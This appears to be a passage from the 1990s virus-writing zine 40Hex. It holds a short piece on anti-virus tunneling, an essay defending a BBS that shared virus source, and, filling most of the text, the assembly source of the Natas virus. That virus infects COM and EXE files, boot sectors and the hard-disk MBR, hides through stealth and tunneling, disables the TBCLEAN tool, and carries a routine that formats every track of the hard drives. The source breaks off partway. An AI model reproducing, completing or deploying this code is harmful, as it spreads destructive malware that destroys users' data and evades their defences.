also apply here. Additionally, the program may, by writing itself back to disk, give the virus the opportunity to reinfect. Remember, any memory resident viruses will already have loaded into memory by the time the program disinfects itself. When the program tries to disinfect itself, any virus that intercepts the 'write file or device' interrupt will intercept this write and re-infect. Again, tunneling is the clear solution. 40Hex Number 12 Volume 3 Issue 3 File 003 [Not so] Recently, the AIS BBS was shut down because of an anonymous letter which stated that the AIS BBS contained and distributed virus source code and helped system hackers develop and test malicious programs. Now, I had been a member of AIS BBS for quite awhile, and it is true that there was virus source code available. The first question I want to ask is: "Who uploaded these viruses?" Hackers uploaded them. To my knowledge there weren't that many hackers on AIS BBS. The majority of the users were people in the computer and computer security industry. By being exposed to virus source code and hackers in general, they would be able to do their job better and more effectively. The anonymous person who complained about AIS BBS clearly didn't do enough research, because if he had, he would have realized that the people who he was worried about obtaining viruses already had them. I would guess that over 90% of the underground material on AIS BBS was contributed by hackers. Which brings me to my next question... "Why did hackers willingly give away their 'secrets' to the people who have always been viewed as the enemy?" The main reason the hackers on AIS BBS contributed to the system was the friendly environment for them on AIS BBS. An important fact about almost all hackers is that for the most part they are just like every other person out there. They aren't evil computer geniuses trying to destroy everyone's vital information. When logging into AIS BBS, a hacker was not assaulted by rude messages, was not refered to as a criminal, but was instead greeted as a fellow computer enthusiast. Of course people wanted advice from hackers, who better to secure a computer system then one who spends countless hours trying to penetrate them. "Are there, or have there ever been other systems like this?" There have been several attempts to achieve a BBS that bridged the gap between hackers and computer security professionals. The first one I had ever heard of was called Face to Face. I am not too sure on the success of this BBS, I only know that it wasn't that great. On my BBS, Landfill, I also attempted to allow the security folks to interact with computer hackers and virus writers, with a message base called 'Security and the Security Impaired'. This forum allowed both sides to speak their mind about a variety of issues, including Van Eck devices (TEMPEST), suggestions for the improvement of currently insecure systems, and in one example, virus writers helped one system administrator with a rampant case of the Maltese Amoeba virus by displaying all of the pertinent information and characteristics of the virus. Another system called Unphamiliar Territories also has a message base with similiar information that is still up and running today with a substantial amount of success! "Who protects us if our protectors are aiding the enemy?" The Bureau of Public Debt has little to do with protecting our country, and in regards to viruses, there is no agency who can protect you from viruses. There is however a way you can protect yourselves. It is through awareness that you can protect your data from the damages incurred by malicious intent. The same awareness that the Bureau of Public Debt was trying to make publicly available on AIS BBS. Before the government did it, everyone else had already done it. This fact may alarm some people, but I would estimate that there are well over 200 other systems in the United States alone that currently distribute virus code to people who very well could end up distributing it to other people without their consent. I am a tax paying citizen of the USA, and I know I would rather hear that we spend a couple hundred dollars educating the public on computer viruses then hear about the thousands of dollars in damage done by miscellaneous computer viruses that hit companies and wipe out all their data. By closing down AIS BBS, the door for virus writers to obtain virus source remains wide open, while the people who could find the information valuable, if not necessary for their jobs, just had the only door open to them slammed shut and locked, maybe forever. It is hard to tell who hurts us more - Those who make it harder for computer users to protect themselves, or those who sit in blind ignorance. -> GHeap ;Natas Virus ;COM/EXE/Boot sector/partition table/full Stealth and polymorphic ;Tunnels ;Does other stuff ;2 files -- v1eng.asm = virus eng.asm = Engine ----------------<>-------------------------------------------------- .model tiny .code file_size equ file_end - v_start sect_size equ (decrypt - v_start + 511) / 512 para_size equ (v_end - v_start + 15) / 16 kilo_size equ (v_end - v_start + 1023) / 1024 find_dos_13 equ tracer_dos_13 - (trace_mode + 1) find_13 equ tracer_13 - (trace_mode + 1) find_15 equ tracer_15 - (trace_mode + 1) find_21 equ tracer_21 - (trace_mode + 1) find_40 equ tracer_40 - (trace_mode + 1) step_21 equ tracer_step_21 - (trace_mode + 1) loader_size equ loader_end - loader no_hook_21 equ new_13_next - (hook_21 + 1) yes_hook_21 equ check_21 - (hook_21 + 1) boot equ 0 file equ 1 years equ 100 shl 1 v_start: jmp decrypt ; push cs ; pop ds ; call copy_ints dw copy_ints - ($ + 2) ; save ints 13 15 21 40 mov ds:hook_21,al ; (0=yes_hook_21) hook 21h mov ds:origin,al ; (0=boot) remeber host mov es,ax ; ES=0 pop di sub di,3 ; address of loader in boot push ax di ; save return address 0:xxxx mov si,offset boot_code call move_boot_code1 ; copy and decode boot code mov al,13h mov dx,offset new_13 call set_int ; hook int 13h call inf_hard ; infect drive C: test byte ptr ds:load_head,dl ; DL=80h drive C:? je boot_retf mov ax,1ffh call random ; time to activate? jne boot_retf jmp kill_disk boot_retf: retf ; return to boot sector ;=====( Copy boot code and (en/de)crypt it )=================================; move_boot_code1:mov ah,ds:[si - 1] ; get key move_boot_code: mov cx,loader_size cld move_boot_loop: lodsb xor al,ah ; code/decode rol ah,1 stosb loop move_boot_loop retn ;=====( Code that was in boot sector before infection )======================; boot_code_key db ? boot_code: db loader_size dup(?) ;=====( Gets inserted into infected Boot sectors/MBRs )======================; loader: call $ + 3 mov di,40h mov ds,di sub word ptr ds:[di-(40h-13h)],kilo_size ; hide memory mov ax,ds:[di-(40h-13h)] mov cl,0ah ror ax,cl ; get TOM address mov es,ax mov ax,200h + sect_size xor bx,bx mov cx,0 load_sect = $ - 2 mov dx,0 load_head = $ - 2 int 13h ; read code into memory jb load_fail push es bx ; address of high code retf load_fail: int 18h loader_end: ;=====( save ints 13h, 15h, 21h & 40h. Assumes ES=CS )=======================; copy_ints: push ds xor ax,ax mov ds,ax ; segment 0 mov si,13h * 4h mov di,offset int_13 push si si movsw movsw ; int 13h to int_13 pop si movsw movsw ; int 13h to dos_13 mov si,15h * 4h movsw movsw ; int 15h to int_15 pop si ; address of int 13h's IVT cmp byte ptr ds:[475h],al ; any hard disks? je copy_int_40 mov si,40h * 4h copy_int_40: movsw movsw ; copy int 13h/40h to int_40 mov si,21h * 4h movsw movsw ; int 21h to int_21 pop ds retn ;=====( get interrupt address )==============================================; get_int: push ax xor ah,ah rol ax,1 rol ax,1 xchg bx,ax xor ax,ax mov es,ax les bx,es:[bx] ; get int address pop ax retn ;=====( Set interrupt address )==============================================; set_int: push ax bx ds xor ah,ah rol ax,1 rol ax,1 xchg ax,bx xor ax,ax push ds mov ds,ax mov ds:[bx],dx pop ds:[bx + 2] pop ds bx ax retn push_all: pop cs:push_pop_ret pushf push ax bx cx dx bp si di ds es mov bp,sp push_pop_jmp: jmp cs:push_pop_ret pop_all: pop cs:push_pop_ret pop es ds di si bp dx cx bx ax popf jmp push_pop_jmp ;=====( Infect Drive C: )====================================================; inf_hard: push cs cs pop es ds mov ax,201h mov bx,offset disk_buff mov cx,1 mov dx,80h call call_13 ; read MBR of drive C: jb cant_inf_hard cmp ds:[bx.pt_start_head],ch ; Jackal? je cant_inf_hard mov cx,ds:[bx.pt_end_sector_track] and cx,0000000000111111b ; get sector count sub cx,sect_size jbe cant_inf_hard cmp cl,1 ; too few sectors? jbe cant_inf_hard call copy_loader ; copy loader into MBR jb cant_inf_hard push bx mov ax,300h + sect_size xor bx,bx call call_13 ; write code to hidden sectors pop bx jb cant_inf_hard mov ax,301h mov cl,1 call call_13 ; write infected MBR cant_inf_hard: retn ;=====( Copy Loader into disk_buff (BX) )====================================; copy_loader: push cx dx cmp word ptr ds:[bx+1feh],0aa55h ; valid boot code? jne copy_load_no mov di,offset boot_code mov ds:[di+load_sect-boot_code],cx ; save track/sector and dl,80h ; Drive C: or A: mov ds:[di+load_head-boot_code],dx ; save head/disk call find_boot ; find code/already infected? je copy_load_no call random_1 ; get random key mov ds:[di - 1],ah ; save key at boot_code_key push si call move_boot_code ; save boot code and encrypt mov si,di ; offset of loader pop di ; boot code pointer mov cx,loader_size rep movsb ; copy loader into boot sect clc mov al,0 org $ - 1 copy_load_no: stc pop dx cx retn ;=====( Find start of boot sector's code )===================================; find_boot: mov si,bx cld lodsb ; get 1st instruction push ax lodsw ; Jump displacement (if jump) xchg cx,ax pop ax cmp al,0ebh ; Short jump? jne find_boot_jump xor ch,ch ; 8bit jump dec si jmp find_boot_add find_boot_jump: cmp al,0e9h ; Near Jump? je find_boot_add find_boot_noadd:xor cx,cx ; No displacement mov si,bx find_boot_add: add si,cx ; si=start of boot code cmp si,offset (disk_buff+200h) - (loader_size + 5) ; jump out of range? jnb find_boot_noadd cmp word ptr ds:[si],00e8h ; CALL -> already infected jne find_boot_ret cmp word ptr ds:[si+2],0bf00h ; 00 MOV DI -> already inf find_boot_ret: retn ;=====( Disable TBCLEAN )====================================================; anti_tbclean: xor ax,ax pushf pop dx and dh,not 1 ; TF off push dx dx popf push ss pop ss pushf ; Not trapped pop dx test dh,1 ; TF set? pop dx je anti_tb_ret push es xor bp,bp mov cx,ss cli mov ss,bp ; segment 0 les di,ss:[bp+1h*4h] ; address of int 1h mov ss,cx sti mov al,0cfh cld stosb ; IRET -> Int 1h pop es push dx popf anti_tb_ret: xchg bp,ax ; save result retn ;=====( Swap jump into DOS' int 13h )========================================; swap_13: call push_all mov si,offset jump_code_13 les di,cs:[si+dos_13-jump_code_13] ; get address in DOS jmp swap_code ;=====( Swap jump into DOS' int 21h )========================================; swap_21: call push_all mov si,offset jump_code_21 les di,cs:[si+int_21-jump_code_21] swap_code: push cs pop ds mov cx,5 cmp ds:origin,ch ; 0 -> Boot origin, no tunnel je swap_end cld swap_loop: lodsb xchg al,es:[di] mov ds:[si-1],al inc di loop swap_loop swap_end: call pop_all retn ;=====( Find original interrupt entry points )===============================; find_ints: call copy_ints ; get interrupt addresses mov ah,52h int 21h mov ax,es:[bx-2] mov ds:dos_seg,ax ; 1st MCB segment mov al,1h call get_int ; get address of int 1h push bx es mov dx,offset tracer call set_int ; hook int 1h pushf pop si mov di,offset trace_mode mov byte ptr ds:[di],find_dos_13 ; find int 13h in DOS ; and BIOS mov ah,1h call si_tf ; set TF call call_13 mov byte ptr ds:[di],find_15 ; find int 15h in BIOS mov ah,0c0h call si_tf ; set TF pushf call ds:int_15 mov byte ptr ds:[di],find_21 ; find int 21h in DOS mov ah,30h call si_tf ; set TF call call_21 mov byte ptr ds:[di],find_40 ; find int 40h in BIOS mov ah,1 call si_tf ; set TF call call_40 and si,not 100h push si popf ; disable Trapping pop ds dx mov al,1 call set_int ; unhook int 1h retn ;=====( Set TF in SI, then set flags to SI )=================================; si_tf: or si,100h push si popf retn ;=====( Tracing/Tunneling )==================================================; tracer: push ds push cs pop ds mov ds:old_di,di mov di,offset old_ax mov ds:[di],ax mov ds:[di+old_bx-old_ax],bx mov ds:[di+old_cx-old_ax],cx mov ds:[di+old_dx-old_ax],dx pop ds:[di-(old_ax-old_ds)] pop bx cx dx ; get IP, CS and Flags mov ax,cs cmp ax,cx ; In our CS? jne $ trace_mode = byte ptr $ - 1 jmp tracer_iret tracer_dos_13: cmp cx,ds:dos_seg ; in DOS code? jnb tracer_cont mov di,offset dos_13 mov ds:trace_mode,find_13 ; find it in BIOS next jmp tracer_save_f tracer_21: cmp cx,1234h ; In DOS code? dos_seg = word ptr $ - 2 jnb tracer_cont mov di,offset int_21 tracer_save: and dh,not 1 ; TF off tracer_save_f: mov ds:[di],bx mov ds:[di + 2],cx ; save address of int jmp tracer_cont tracer_15: mov di,offset int_15 jmp tracer_bios tracer_40: mov di,offset int_40 jmp tracer_bios tracer_13: mov di,offset int_13 tracer_bios: cmp ch,0c8h ; Below BIOS? jb tracer_cont cmp ch,0f4h ; Above BIOS? jb tracer_save jmp tracer_cont tracer_step_21: dec ds:inst_count ; down counter jne tracer_cont push dx mov al,1 lds dx,ds:int_1 ; get int 1h address call set_int call swap_21 ; insert int 21h jump pop dx and dh,not 1h ; TF off tracer_cont: test dh,1 ; TF on? je tracer_iret get_inst: mov ds,cx ; instruction CS xor di,di get_inst1: mov ax,ds:[bx + di] ; get instruction cmp al,0f0h ; LOCK je skip_prefix cmp al,0f2h ; REPNE je skip_prefix cmp al,0f3h ; REPE? je skip_prefix cmp al,9ch ; PUSHF or above? jae emulate_pushf and al,11100111b ; 26,2e,36,3e = 26 cmp al,26h ; Segment Prefix? jne tracer_iret skip_prefix: inc di jmp get_inst1 emulate_pushf: jne emulate_popf and dh,not 1 ; TF off push dx ; fake PUSHF emulate_next: lea bx,ds:[bx + di + 1] ; skip instruction emulate_tf: or dh,1 ; TF on jmp get_inst emulate_popf: cmp al,9dh ; POPF? jne emulate_iret pop dx ; fake POPF jmp emulate_next emulate_iret: cmp al,0cfh ; IRET? jne emulate_int pop bx cx dx ; fake IRET jmp emulate_tf emulate_int: cmp al,0cdh ; Int xx je emulate_int_xx cmp al,0cch ; Int 3? mov ah,3 je emulate_int_x cmp al,0ceh ; Into? mov ah,4 jne tracer_iret test dh,8 ; OF set? je tracer_iret emulate_int_x: dec bx ; [bx+di+2-1] emulate_int_xx: and dh,not 1 ; TF off lea bx,ds:[bx + di + 2] ; get return address push dx cx bx ; fake Int mov al,ah push es call get_int ; get interrupt address mov cx,es pop es jmp emulate_tf tracer_iret: push dx cx bx ; save flags, cs & ip mov ax,0 old_ds = word ptr $ - 2 mov ds,ax mov ax,0 old_ax = word ptr $ - 2 mov bx,0 old_bx = word ptr $ - 2 mov cx,0 old_cx = word ptr $ - 2 mov dx,0 old_dx = word ptr $ - 2 mov di,0 old_di = word ptr $ - 2 iret ;=====( file infections come here after decryption )=========================; file_start: push ds ; save PSP segment call $ + 3 pop si sub si,offset $ - 1 call anti_tbclean ; disable TBCLEAN or bp,bp ; TBCLEAN active? jne go_res mov ah,30h mov bx,-666h int 21h cmp al,3h ; must be DOS 3+ jb jump_host go_res: mov ax,es dec ax mov ds,ax xor di,di or bp,bp ; TBCLEAN here? jne dont_check_mcb cmp byte ptr ds:[di],'Z' ; Last Block? jne jump_host dont_check_mcb: mov ax,para_size sub ds:[di + 3],ax ; from MCB sub ds:[di + 12h],ax ; from PSP mov es,ds:[di + 12h] ; get memory address mov ds,di sub word ptr ds:[413h],kilo_size ; from int 12h mov cx,jump_code_13-v_start cld rep movs byte ptr es:[di],byte ptr cs:[si] mov ax,offset high_code push es ax retf jump_host: push cs pop ds pop es ; PSP segment lea si,ds:[si + header] ; get address of header mov ax,ds:[si] ; get 1st instruction cmp ax,'ZM' ; EXE? je jump_2_exe cmp ax,'MZ' ; EXE? je jump_2_exe mov cx,18h / 2 mov di,100h push es di cld rep movsw ; repair .COM file push es pop ds xchg ax,cx retf jump_2_exe: mov ax,es add ax,10h add ds:[si.eh_cs],ax add ax,ds:[si.eh_ss] ; get SS/CS push es pop ds cli mov ss,ax mov sp,cs:[si.eh_sp] xor ax,ax sti jmp dword ptr cs:[si.eh_ip] high_code: push cs pop ds mov byte ptr ds:[di+origin-jump_code_13],file ; tunnel mov ax,2 call random ; 1 in 3 chance of no stealth ; on special programs mov ds:check_special,al mov ds:hook_21,no_hook_21 ; dont hook int 21h mov al,0eah stosb ; store at jump_code_13 mov ds:[di+4],al mov ax,offset new_13 stosw mov word ptr ds:[di+3],offset new_21 mov ds:[di],cs mov ds:[di+5],cs push di call find_ints ; trace interrupts pop di push cs pop ds mov ax,ds:dos_seg cmp word ptr ds:[di+(dos_13+2)-(jump_code_13+3)],ax ; found DOS' int 13h? ja call_inf_hard cmp word ptr ds:[di+(int_21+2)-(jump_code_13+3)],ax ; found DOS' int 21h? ja call_inf_hard call swap_13 call swap_21 ; insert jumps into DOS call_inf_hard: call inf_hard ; infect drive C: or bp,bp ; ZF -> No TBCLEAN mov si,bp ; SI=0 if goto jump_host jne kill_disk jmp jump_host kill_disk: xor bx,bx mov es,bx ; table to use for format mov dl,80h ; Drive C: kill_next_disk: xor dh,dh ; head 0 kill_next_track:xor cx,cx ; track 0 kill_format: mov ax,501h call call_disk ; format track and cl,11000000b inc ch ; next track low jne kill_format add cl,40h ; next track high jne kill_format xor ah,ah int 13h ; reset disk inc dh ; next head cmp dh,10h jb kill_next_track inc dx ; next drive jmp kill_next_disk ;=====( Interrupt 13h handler )==============================================; new_13: jmp $ hook_21 = byte ptr $ - 1 check_21: call push_all mov al,21h call get_int ; get int 21h address mov ax,es push cs cs pop ds es cmp ax,800h ; too high? ja cant_hook_21 mov di,offset int_21 + 2 std xchg ax,ds:[di] ; swap addresses scasw ; did it change? je cant_hook_21 mov ds:[di],bx mov al,21h mov dx,offset new_21 call set_int ; hook int 21h mov ds:hook_21,no_hook_21 cant_hook_21: call pop_all new_13_next: cmp ah,2h ; Read? jne jump_13 cmp cx,1 ; track 0, sector 1? jne jump_13 or dh,dh ; head 0? je hide_boot jump_13: call call_dos_13 retf 2h hide_boot: call call_dos_13 ; read boot sector call push_all jb hide_boot_err push es cs pop es ds mov cx,100h mov si,bx mov di,offset disk_buff mov bx,di cld rep movsw ; copy boot sector to buffer push cs pop ds call find_boot ; find start/already infected? jne inf_boot mov ax,201h mov cx,ds:[si+load_sect-loader] mov dh,byte ptr ds:[si+(load_head+1)-loader] ; get code location call call_disk ; read virus code jb hide_boot_err mov ax,ds:[0] cmp ds:[bx],ax ; verify infection jne hide_boot_err mov di,ss:[bp.reg_bx] mov es,ss:[bp.reg_es] ; get caller's buffer sub si,bx ; displacement into boot sect. add di,si ; address of loader lea si,ds:[bx+(boot_code-v_start)] ; boot code in virus call move_boot_code1 ; hide infection hide_boot_err: call pop_all retf 2h inf_boot: cmp dl,80h ; hard disk? jnb hide_boot_err mov ax,301h mov cx,1 call call_disk ; Write boot sector to disk ; CY -> Write-Protected jb hide_boot_err mov si,dx ; save drive # mov di,bx mov ax,ds:[di.bs_sectors] ; get number of sectors mov cx,ds:[di.bs_sectors_per_track] sub ds:[di.bs_sectors],cx ; prevent overwriting of code mov ds:hide_count,cx xor dx,dx or ax,ax ; error? je hide_boot_err jcxz hide_boot_err div cx or dx,dx ; even division? jne hide_boot_err mov bx,ds:[di.bs_heads] ; get number of heads or bx,bx je hide_boot_err div bx or dx,dx jne hide_boot_err dec ax mov ch,al ; last track mov cl,1 ; sector 1 dec bx mov dx,si ; drive mov dh,bl ; last head mov bx,di ; offset disk buffer call copy_loader ; Copy loader into Boot sector jb hide_boot_err mov ax,300h + sect_size xor bx,bx call call_disk jb hide_boot_err mov ax,301h mov bx,offset disk_buff mov cx,1 xor dh,dh call call_disk ; write boot sector to disk mov bx,ss:[bp.reg_bx] mov ds,ss:[bp.reg_es] ; get caller's buffer sub ds:[bx.bs_sectors],9ffh ; prevent overwriting of code hide_count = word ptr $ - 2 jmp hide_boot_err ;=====( Interrupt 21h handler )==============================================; new_21: cli mov cs:int_21_ss,ss mov cs:int_21_sp,sp ; save stack pointers push cs pop ss mov sp,offset temp_stack ; allocate stack sti call push_all in al,21h or al,2 ; disable keyboard out 21h,al push cs pop ds mov di,offset new_24 mov word ptr ds:[di-(new_24-handle)],bx ; save handle mov al,24h call get_int ; get address of int 24h mov word ptr ds:[di-(new_24-int_24)],bx mov word ptr ds:[di-(new_24-(int_24+2))],es mov word ptr ds:[di],03b0h ; MOV AL,3 mov byte ptr ds:[di+2],0cfh ; IRET mov dx,di call set_int ; hook int 24h call pop_all call swap_21 ; remove jump from int 21h call push_all cmp ah,30h ; get DOS version? jne is_dir_fcb add bx,666h ; looking for us? jnz is_dir_fcb mov ss:[bp.reg_ax],bx ; set DOS version=0 mov ss:[bp.reg_bx],bx jmp retf_21 is_dir_fcb: cmp ah,11h jb is_dir_asciiz cmp ah,12h ja is_dir_asciiz call call_21 ; do find or al,al ; error? je dir_fcb jmp jump_21 dir_fcb: call save_returns ; save AX call get_psp ; get current PSP mov ax,'HC' scasw ; CHKDSK? jne dir_fcb_ok mov ax,'DK' scasw jne dir_fcb_ok mov ax,'KS' scasw je retf_21 dir_fcb_ok: call get_dta ; get DTA address xor di,di cmp byte ptr ds:[bx],-1 ; extended FCB? jne dir_fcb_next mov di,7h ; fix it up dir_fcb_next: lea si,ds:[bx+di.ds_date+1] ; offset of year -> SI dir_hide: call is_specialfile ; no stealth if helper je retf_21 cmp byte ptr ds:[si],years ; infected? jc retf_21 sub byte ptr ds:[si],years ; restore old date les ax,ds:[bx+di.ds_size] ; get size of file mov cx,es sub ax,file_size ; hide size increase sbb cx,0 jc retf_21 mov word ptr ds:[bx+di.ds_size],ax mov word ptr ds:[bx+di.ds_size+2],cx ; save new size retf_21: call undo_24 ; unhook int 24h call pop_all call swap_21 ; insert jump cli mov ss,cs:int_21_ss mov sp,cs:int_21_sp sti retf 2 is_dir_asciiz: cmp ah,4eh jb is_lseek cmp ah,4fh ja is_lseek call call_21 jnc dir_asciiz go_jump_21: jmp jump_21 dir_asciiz: call save_returns ; save AX and flags call get_dta ; get dta address mov di,-3 lea si,ds:[bx.dta_date+1] ; get year address jmp dir_hide is_lseek: cmp ax,4202h ; Lseek to end? jne is_date call call_21_file jb go_jump_21 call get_dcb ; get DCB address jbe lseek_exit call is_specialfile ; dont hide true size from ; helpers je lseek_exit sub ax,file_size sbb dx,0 ; hide virus at end mov word ptr ds:[di.dcb_pos],ax mov word ptr ds:[di.dcb_pos+2],dx ; set position in DCB lseek_exit: clc call save_returns ; save AX/flags mov ss:[bp.reg_dx],dx jmp retf_21 is_date: cmp ax,5700h ; get date? je get_date cmp ax,5701h ; set date? jne is_read call get_dcb jbe date_err cmp dh,years ; already setting 100 years? jnb date_err add dh,years ; dont erase marker get_date: call is_specialfile ; do not hide date for ; helpers je date_err call call_21_file ; get/set date jnc date_check date_err: jmp jump_21 date_check: cmp dh,years ; infected? jb date_ok sub dh,years date_ok: clc call save_returns ; save ax/flags mov ss:[bp.reg_cx],cx mov ss:[bp.reg_dx],dx ; save time/date jmp retf_21 is_read: cmp ah,3fh ; reading file? je do_read no_read: jmp is_write do_read: call get_dcb ; get DCB address jbe no_read call is_specialfile je no_read les ax,ds:[di.dcb_size] ; get size of file mov bx,es les dx,ds:[di.dcb_pos] ; get current position mov si,es and cs:read_bytes,0 or si,si ; in 1st 64k? jnz read_high cmp dx,18h ; reading header? jnb read_high push cx add cx,dx cmc jnc read_above cmp cx,18h ; read goes above header? read_above: pop cx jb read_below mov cx,18h sub cx,dx read_below: push ax bx ; save size push dx ; position sub dx,18h add ax,dx ; get position in header cmc sbb bx,si xchg word ptr ds:[di.dcb_pos],ax xchg word ptr ds:[di.dcb_pos+2],bx ; lseek to header push ax bx push ds mov ah,3fh mov dx,ss:[bp.reg_dx] mov ds,ss:[bp.reg_ds] call call_21_file ; read file pop ds pop word ptr ds:[di.dcb_pos+2] pop word ptr ds:[di.dcb_pos] pop dx pushf add dx,ax ; adjust position add cs:read_bytes,ax ; remember # of bytes read popf pop bx ax jnc read_high jmp jump_21 read_high: mov word ptr ds:[di.dcb_pos],dx ; update position mov word ptr ds:[di.dcb_pos+2],si mov cx,ss:[bp.reg_cx] ; number of bytes to read sub cx,cs:read_bytes sub ax,file_size sbb bx,0 ; get original size push ax bx sub ax,dx sbb bx,si ; in virus now? pop bx ax jnc read_into xor cx,cx ; read 0 bytes jmp read_fake read_into: add dx,cx adc si,0 ; get position after read cmp bx,si ; read extends into virus? ja read_fake jb read_adjust cmp ax,dx jnb read_fake read_adjust: sub dx,cx ; get position again xchg cx,ax sub cx,dx ; # of bytes to read = Original size - Pos read_fake: mov ah,3fh mov dx,ss:[bp.reg_dx] add dx,cs:read_bytes mov ds,ss:[bp.reg_ds] call call_21_file ; read file jc read_exit add ax,0 read_bytes = word ptr $ - 2 clc read_exit: call save_returns jmp retf_21 is_write: cmp ah,40h ; write? je do_write no_write: jmp is_infect do_write: call get_dcb jbe no_write les ax,ds:[di.dcb_size] ; get file size mov bx,es sub ax,18h sbb bx,0 ; get header position xchg ax,word ptr ds:[di.dcb_pos] xchg bx,word ptr ds:[di.dcb_pos+2] ; lseek to header push ax bx mov ax,2 xchg ax,ds:[di.dcb_mode] ; read/write mode push ax push ds cs pop ds es call read_header ; read 18h bytes pop es:[di.dcb_mode] ; restore access mode jc write_rest_pos mov word ptr es:[di.dcb_pos],ax mov word ptr es:[di.dcb_pos+2],ax ; lseek to start call write_header ; write old header jc write_rest_pos push es pop ds sub word ptr ds:[di.dcb_size],file_size sbb word ptr ds:[di.dcb_size+2],ax ; truncate at virus sub byte ptr ds:[di.dcb_date+1],years ; remove 100 years write_rest_pos: pop word ptr es:[di.dcb_pos+2] pop word ptr es:[di.dcb_pos] jmp jump_21 is_infect: cmp ah,3eh ; Close? je infect_3e cmp ax,4b00h ; Execute? je infect_4b jmp jump_21 infect_4b: mov ax,3d00h ; Open file cmp ax,0 org $ - 2 infect_3e: mov ah,45h ; Duplicate handle call int_2_bios ; lock out protection programs call call_21_file ; get handle mov cs:handle,ax mov ax,4408h cwd jc undo_bios call get_dcb ; get DCB for handle jb cant_infect jne cant_infect ; error/already infected mov bl,00111111b and bl,byte ptr ds:[di.dcb_dev_attr] ; get drive code mov dl,bl ; DX=00** inc bx ; 0=default,1=a,2=b,3=c,etc. call call_21 ; drive removable? mov cx,1h push cs pop es jc test_prot_drive dec ax ; 1=non-removable jz no_protect jmp test_protect test_prot_drive:cmp dl,1 ; A or B? ja no_protect test_protect: mov ax,201h mov bx,offset disk_buff int 13h ; read sector jc cant_infect mov ax,301h int 13h ; write it back jc cant_infect no_protect: inc cx ; CX=2 xchg cx,ds:[di.dcb_mode] ; read/write access mode push cx xor ax,ax xchg ah,ds:[di.dcb_attr] ; attribute=0 test ah,00000100b ; system file? push ax jne cant_system cbw cwd xchg ax,word ptr ds:[di.dcb_pos] xchg dx,word ptr ds:[di.dcb_pos+2] ; lseek to 0 push ax dx mov bp,-'OC' add bp,word ptr ds:[di.dcb_ext] ; BP=0 of CO jnz not_com mov bp,-'MO' add bp,word ptr ds:[di.dcb_ext+1] ; BP=0 if OM not_com: call infect pushf call get_dcb popf jc not_infected add byte ptr ds:[di.dcb_date+1],years ; add 100 years not_infected: or byte ptr ds:[di.dcb_dev_attr+1],40h ; no time/date pop word ptr ds:[di.dcb_pos+2] pop word ptr ds:[di.dcb_pos] cant_system: pop word ptr ds:[di.dcb_attr-1] ; restore attribute pop ds:[di.dcb_mode] ; restore access mode cant_infect: mov ah,3eh call call_21_file ; close file undo_bios: call int_2_bios ; restore interrupts ;=====( Jump on to int 21h )=================================================; jump_21: call undo_24 ; unhook int 24h push cs pop ds mov al,1h mov di,offset int_1 cmp byte ptr ds:[di+origin-int_1],al ; file origin? jne jump_21_1 call get_int ; get int 1h address mov ds:[di],bx mov ds:[di + 2],es mov byte ptr ds:[di+inst_count-int_1],5 mov ds:trace_mode,step_21 mov dx,offset tracer call set_int ; hook int 1h call pop_all push si pushf pop si call si_tf ; set TF pop si go_21: cli mov ss,cs:int_21_ss mov sp,cs:int_21_sp ; restore stack sti go_2_21: jmp cs:int_21 jump_21_1: call pop_all jmp go_21 ;=====( actual infection routine )===========================================; infect: push cs pop ds call read_header ; read first 18h bytes jc inf_bad_file mov si,dx mov di,offset work_header cld rep movsb ; copy header to work_header call get_dcb les ax,ds:[di.dcb_size] ; get file size mov dx,es mov word ptr ds:[di.dcb_pos],ax mov word ptr ds:[di.dcb_pos+2],dx ; lseek to end push cs cs pop es ds mov cx,ds:[si] ; get first 2 bytes cmp cx,'MZ' ; .EXE file? je inf_exe cmp cx,'ZM' ; .EXE file? je inf_exe or dx,bp ; COM file and < 64k? jnz inf_bad_file cmp ax,0-(file_size+100) ja inf_bad_file cmp ax,1000 jb inf_bad_file mov byte ptr ds:[si],0e9h ; build jump inc ah ; Add PSP size (100h) push ax ; save IP for engine add ax,offset decrypt-103h ; get jump disp. (- PSP size) mov ds:[si+1],ax jmp append_vir inf_bad_file: stc retn inf_exe: cmp word ptr ds:[si.eh_max_mem],-1 jne inf_bad_file mov bp,ax mov di,dx ; save size in DI:BP mov cx,200h div cx ; divide into pages or dx,dx ; Any remainder? jz no_round inc ax no_round: sub ax,ds:[si.eh_size] ; size same as header says? jne inf_bad_file sub dx,ds:[si.eh_modulo] jne inf_bad_file mov ax,file_size ; virus size add ax,bp adc dx,di ; + program size div cx ; / 512 or dx,dx ; round up? jz no_round1 inc ax no_round1: mov ds:[si.eh_size],ax mov ds:[si.eh_modulo],dx ; set new size mov bx,0-(file_size+1000) xor cx,cx get_exe_ip: cmp bp,bx ; make sure virus does not ; cross segments jb got_exe_ip sub bp,10h ; down 10h bytes loop get_exe_ip ; up 1 paragraph got_exe_ip: cmp di,0fh ja inf_bad_file xchg cx,ax mov cl,4 ror di,cl ; get segment displacement or ax,ax jz no_para_add sub di,ax ; Add segments from LOOP jnc inf_bad_file no_para_add: sub di,ds:[si.eh_size_header] ; CS-header size in ; paragraphs push bp ; save offset of v_start add bp,decrypt-v_start mov ds:[si.eh_ip],bp ; set IP mov ds:[si.eh_cs],di ; set CS add bp,512 ; 512 bytes of stack mov ds:[si.eh_sp],bp ; set SP mov ds:[si.eh_ss],di ; set SS mov bp,8000h ; Tell engine "Exe file" sar bx,cl ; 0 - ((file_size+1000h)/16) mov ax,ds:[si.eh_min_mem] sub ax,bx ; add file_size+1000h/16 jnb append_vir mov ds:[si.eh_min_mem],ax append_vir: pop ax call engine ; encrypt/write/decrypt push bp popf jc append_vir_err call get_dcb mov word ptr ds:[di.dcb_pos],cx mov word ptr ds:[di.dcb_pos+2],cx ; lseek to start mov ah,40h mov dx,offset work_header push cs pop ds call header_op ; write new header to file append_vir_err: retn ;=====( Get DCB address for file )===========================================; get_dcb: push ax bx mov ax,1220h mov bx,cs:handle ; get file handle int 2fh ; get DCB number address jc get_dcb_fail mov ax,1216h mov bl,es:[di] ; get DCB number cmp bl,-1 ; Handle Openned? cmc je get_dcb_fail int 2fh ; get DCB address jc get_dcb_fail push es pop ds test byte ptr ds:[di.dcb_dev_attr],80h ; device or file? cmc jne get_dcb_fail test byte ptr ds:[di.dcb_date+1],80h ; infected? get_dcb_fail: pop bx ax retn ;=====( Swap original 13h/15h/40h addresses with IVT addresses )=============; int_2_bios: push ax bx dx ds mov al,13h ; int 13h mov di,offset int_13 int_2_bios_lp: push cs pop ds call get_int ; get int address mov dx,es xchg bx,ds:[di] ; swap offsets cld scasw xchg dx,bx xchg bx,ds:[di] ; swap segments scasw mov ds,bx ; 